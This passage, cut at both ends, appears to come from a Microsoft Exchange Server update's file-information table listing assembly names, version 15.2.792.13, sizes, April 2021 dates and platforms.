15.2.792.13| 15,744| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.792.13| 36,752| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.792.13| 15,760| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.792.13| 79,768| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.792.13| 396,184| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.792.13| 21,400| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.792.13| 57,224| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.792.13| 14,712| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.792.13| 35,720| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.792.13| 276,368| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.792.13| 16,256| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.792.13| 26,008| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.792.13| 13,704| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.792.13| 23,424| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.792.13| 377,728| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.792.13| 83,864| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.792.13| 2,971,000| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.792.13| 5,029,768| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.792.13| 893,848| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.792.13| 413,560| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.792.13| 924,568| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.792.13| 31,624| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.792.13| 52,112| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.792.13| 21,912| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.792.13| 33,672| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.792.13| 3,515,288| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.792.13| 108,424| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.792.13| 288,640| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.792.13| 625,536| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.792.13| 86,416| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.792.13| 1,830,296| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.792.13| 31,640| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.792.13| 466,312| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.792.13| 26,000| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.792.13| 38,296| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.792.13| 102,784| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.792.13| 48,536| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.792.13| 67,448| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.common.dll| 15.2.792.13| 172,952| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.792.13| 113,536| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.common.il.dll| 15.2.792.13| 13,720| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.792.13| 130,432| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.792.13| 63,880| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.792.13| 19,848| 04-Apr-2021| 10:04| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.792.13| 15,256| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.search.dll| 15.2.792.13| 108,928| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.792.13| 17,792| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.792.13| 51,592| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.792.13| 36,728| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.792.13| 27,544| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.792.13| 1,042,304| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.792.13| 29,072| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.792.13| 181,128| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.792.13| 30,088| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.792.13| 22,424| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.792.13| 85,912| 04-Apr-2021| 10:04| x64 \nMicrosoft.exchange.compliance.dll| 15.2.792.13| 41,344| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.792.13| 37,248| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.792.13| 50,584| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.792.13| 33,176| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.792.13| 1,100,688| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.792.13| 206,744| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.792.13| 210,840| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.compression.dll| 15.2.792.13| 17,288| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.792.13| 37,768| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.792.13| 14,216| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.792.13| 145,808| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.792.13| 14,208| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.792.13| 53,144| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.792.13| 15,760| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.792.13| 23,424| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.792.13| 13,208| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.792.13| 54,664| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.792.13| 13,696| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.792.13| 1,846,152| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.792.13| 30,080| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.792.13| 68,504| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.792.13| 15,248| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.792.13| 21,400| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.792.13| 25,984| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.792.13| 169,856| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.792.13| 330,136| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.792.13| 173,976| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.792.13| 71,064| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.792.13| 203,648| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.context.client.dll| 15.2.792.13| 27,024| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.792.13| 51,608| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.context.core.dll| 15.2.792.13| 51,088| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.792.13| 46,976| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.792.13| 1,093,504| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.792.13| 57,216| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.792.13| 326,552| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.792.13| 3,353,480| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.792.13| 35,712| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.792.13| 17,816| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.792.13| 165,272| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.792.13| 619,400| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.792.13| 7,792,000| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.792.13| 80,280| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.data.dll| 15.2.792.13| 1,789,320| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.792.13| 1,626,488| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.792.13| 375,192| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.792.13| 105,352| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.792.13| 15,744| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.792.13| 224,664| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.792.13| 186,760| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.792.13| 39,816| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.792.13| 119,176| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.792.13| 968,072| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.792.13| 141,200| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.792.13| 769,416| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.792.13| 139,664| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.792.13| 56,728| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.792.13| 453,016| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.792.13| 32,648| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.792.13| 256,912| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.792.13| 11,815,320| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.792.13| 37,752| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.792.13| 655,752| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.792.13| 175,512| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.792.13| 36,248| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.792.13| 14,208| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.792.13| 14,232| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.792.13| 14,712| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.792.13| 72,600| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.792.13| 22,912| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.792.13| 2,213,272| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.792.13| 2,213,272| 04-Apr-2021| 10:03| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.792.13| 23,960| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.792.13| 546,704| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.792.13| 215,424| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.792.13| 194,432| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.792.13| 146,304| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.792.13| 27,528| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.792.13| 13,696| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.792.13| 49,536| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.792.13| 28,048| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.792.13| 208,792| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.792.13| 88,984| 04-Apr-2021| 10:04| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.792.13| 32,640| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.792.13| 45,944| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.792.13| 18,824| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.792.13| 473,480| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.792.13| 206,232| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.792.13| 36,744| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.792.13| 131,480| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.792.13| 21,896| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.792.13| 148,368| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.792.13| 220,032| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.792.13| 23,960| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.792.13| 97,664| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.792.13| 1,266,056| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.792.13| 1,266,056| 04-Apr-2021| 10:05| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,507| 04-Apr-2021| 10:07| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.792.13| 87,424| 04-Apr-2021| 10:07| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,481| 04-Apr-2021| 10:07| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.792.13| 52,104| 04-Apr-2021| 10:05| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.792.13| 292,248| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.792.13| 73,088| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.792.13| 45,960| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.792.13| 218,504| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.792.13| 78,216| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.792.13| 35,720| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.792.13| 935,288| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.792.13| 336,264| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.792.13| 52,616| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.792.13| 32,152| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.792.13| 60,800| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.792.13| 854,416| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.792.13| 291,720| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.792.13| 39,312| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.792.13| 76,160| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.792.13| 166,784| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.792.13| 1,486,744| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.792.13| 122,256| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.792.13| 12,327,320| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.792.13| 264,088| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.792.13| 37,760| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.792.13| 186,776| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.792.13| 64,408| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.792.13| 83,848| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.792.13| 63,888| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.792.13| 100,248| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.792.13| 144,776| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.792.13| 270,232| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.792.13| 15,256| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.792.13| 15,744| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.792.13| 130,440| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.792.13| 254,352| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.792.13| 37,264| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.792.13| 640,904| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.792.13| 37,256| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.792.13| 146,328| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:04| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.792.13| 596,376| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.792.13| 14,736| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.792.13| 30,080| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.792.13| 99,704| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.792.13| 42,376| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.792.13| 40,328| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.792.13| 54,168| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.792.13| 164,248| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.792.13| 58,760| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.792.13| 204,184| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.792.13| 17,800| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.792.13| 30,600| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.792.13| 38,800| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.792.13| 48,528| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.792.13| 180,632| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.792.13| 36,760| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.792.13| 26,008| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.792.13| 1,868,184| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.792.13| 54,680| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.792.13| 35,728| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.792.13| 35,736| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.792.13| 18,312| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.792.13| 18,312| 04-Apr-2021| 10:03| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.792.13| 263,056| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.792.13| 263,056| 04-Apr-2021| 10:04| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.792.13| 24,960| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.792.13| 24,960| 04-Apr-2021| 10:04| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.792.13| 53,120| 04-Apr-2021| 10:03| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.792.13| 216,984| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.792.13| 32,128| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.792.13| 281,992| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.792.13| 18,832| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.792.13| 83,848| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.792.13| 15,232| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.792.13| 94,096| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.792.13| 1,840,504| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.792.13| 71,576| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.792.13| 175,488| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.792.13| 45,976| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.792.13| 159,624| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.792.13| 51,072| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.792.13| 45,952| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.792.13| 32,152| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.792.13| 100,248| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.792.13| 271,240| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.792.13| 22,424| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.792.13| 33,688| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.792.13| 18,312| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.792.13| 15,240| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.792.13| 27,528| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.792.13| 30,608| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.792.13| 22,408| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.792.13| 66,432| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.792.13| 29,576| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.792.13| 19,864| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.792.13| 20,360| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.792.13| 19,352| 04-Apr-2021| 10:04| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.792.13| 34,184| 